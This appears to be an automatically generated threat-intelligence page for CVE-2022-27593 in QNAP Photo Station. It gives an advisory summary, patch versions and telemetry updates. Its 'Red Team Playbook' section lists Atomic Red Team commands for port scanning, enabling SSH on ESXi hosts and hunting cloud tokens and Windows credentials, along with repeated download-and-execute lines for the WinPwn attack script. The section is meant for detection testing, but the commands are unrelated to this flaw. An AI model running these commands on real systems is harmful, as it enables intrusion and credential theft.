CVE-2022-27593
Overview
This vulnerability is an externally controlled reference to a resource flaw within QNAP Photo Station, a component of QNAP NAS devices. The root cause lies in improper validation of user-supplied input that is used to reference internal system files. This lack of input sanitization enables unauthorized access to sensitive file paths through the Photo Station web interface.
Vulnerability Description
An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later
Impact
An unauthenticated attacker can leverage this vulnerability to read or modify critical system files on QNAP NAS devices running vulnerable Photo Station versions. This can lead to arbitrary code execution, enabling full system compromise or lateral movement within the network. The attack requires no user interaction or credentials, exposing sensitive data and potentially disrupting NAS operations or enabling persistent unauthorized access.
Solution
QNAP has addressed this vulnerability with updates to Photo Station in multiple QTS versions: Photo Station 6.1.2 on QTS 5.0.1 and later, 6.0.22 on QTS 5.0.0/4.5.x and later, 5.7.18 on QTS 4.3.6 and later, 5.4.15 on QTS 4.3.3 and later, and 5.2.14 on QTS 4.2.6 and later. Administrators should apply these updates promptly. Detailed patch instructions and advisory information are available at QNAP's security advisory page: https://www.qnap.com/en/security-advisory/qsa-22-24.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting QNAP's Photo Station is characterized by an externally controlled reference to a resource, which allows an attacker to manipulate system files. This flaw arises from improper validation of user-supplied input, enabling unauthorized access to sensitive resources within the system. When an attacker successfully exploits this vulnerability, they can alter critical system files, potentially leading to a complete compromise of the affected device. The severity of this vulnerability is underscored by its high CVSS score of 9.1, indicating that it poses a significant risk to the confidentiality, integrity, and availability of the affected systems.
Attack vectors for this vulnerability are varied and can be executed through multiple means. An attacker could leverage social engineering techniques to trick users into providing access or could directly exploit the vulnerability through crafted requests to the Photo Station application. Given that the affected product is a network-attached storage (NAS) device commonly used for personal and small business data management, the potential for exploitation is significant. Scenarios may include unauthorized file access, data manipulation, or even the installation of malicious software that could further compromise the network environment. The ease of access to these devices, often exposed to the internet, amplifies the risk of exploitation.
The real-world impact of this vulnerability can be profound, particularly for businesses relying on QNAP NAS devices for data storage and management. Unauthorized modification of system files could lead to data loss, corruption, or theft, resulting in operational disruptions and financial losses. Additionally, the breach of sensitive data could expose organizations to regulatory penalties, reputational damage, and loss of customer trust. For individuals, the implications may include the loss of personal data, privacy violations, and potential identity theft. The interconnected nature of modern networks means that the ramifications of a successful attack could extend beyond the immediate target, affecting other systems and users within the same environment.
To effectively detect and mitigate this vulnerability, organizations should implement a multifaceted approach. Regular software updates and patch management are critical, as the vendor has released fixes in various versions of the QTS operating system and Photo Station. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Employing intrusion detection systems (IDS) and conducting regular security audits can further enhance an organization’s ability to identify and respond to potential threats. Additionally, educating users about security best practices, such as recognizing phishing attempts and maintaining strong authentication measures, can significantly reduce the likelihood of successful exploitation.
In conclusion, the vulnerability within QNAP's Photo Station represents a serious threat to both individual users and organizations. Its potential for exploitation through various attack vectors highlights the importance of proactive security measures. By prioritizing timely updates, robust monitoring, and user education, organizations can mitigate the risks associated with this vulnerability and safeguard their data integrity and operational continuity. The evolving landscape of cybersecurity threats necessitates a vigilant and informed approach to protect against such vulnerabilities effectively.
CSURFACE threat intelligence has observed a significant reduction in detection activity related to CVE-2022-27593, despite the vulnerability’s CVSS score being updated to the maximum severity of 10.0. This adjustment reflects a refined understanding of the exploit’s potential impact, particularly its confirmed use by ransomware actors, which underscores the criticality of the flaw. However, our telemetry indicates that active exploitation attempts have stabilized at low levels, with no new proof-of-concept exploits or attack campaigns emerging recently. The elevated CVSS score signals that successful exploitation could have devastating consequences, reinforcing the vulnerability’s prioritization for remediation. Defenders should interpret this as a high-risk issue that remains relevant due to its ransomware association, even though immediate exploitation pressure appears diminished. The current threat landscape suggests a persistent latent risk rather than an active surge, necessitating ongoing vigilance.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2022-27593, indicating a modest resurgence in attempts to exploit this vulnerability. Concurrently, the CVSS score has been adjusted downward from a perfect 10.0 to 9.1, reflecting a refined understanding of the exploit’s impact and exploitability parameters. While no new proof-of-concept exploits or attack campaigns have surfaced, the uptick in telemetry suggests adversaries remain interested, particularly given the vulnerability’s known association with ransomware operations. This subtle shift underscores that the threat remains active but controlled, reinforcing the need for continued monitoring. The updated risk assessment positions CVE-2022-27593 as a critical but stable threat, where exploitation attempts are neither escalating rapidly nor diminishing significantly, maintaining its status as a high-priority concern for defenders.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qnap | Photo Station | All |
cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
|
|
|
Qnap | Photo Station | All |
cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
|
|
|
Qnap | Photo Station | All |
cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
|
|
|
Qnap | Photo Station | All |
cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
|
|
|
Qnap | Photo Station | All |
cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-219 | XML Routing Detour Attacks |
30%
|
High | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-27593 |
| qnap.com |
GitHub CVE
x_refsource_MISC
|
https://www.qnap.com/en/security-advisory/qsa-22-24 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-27593 |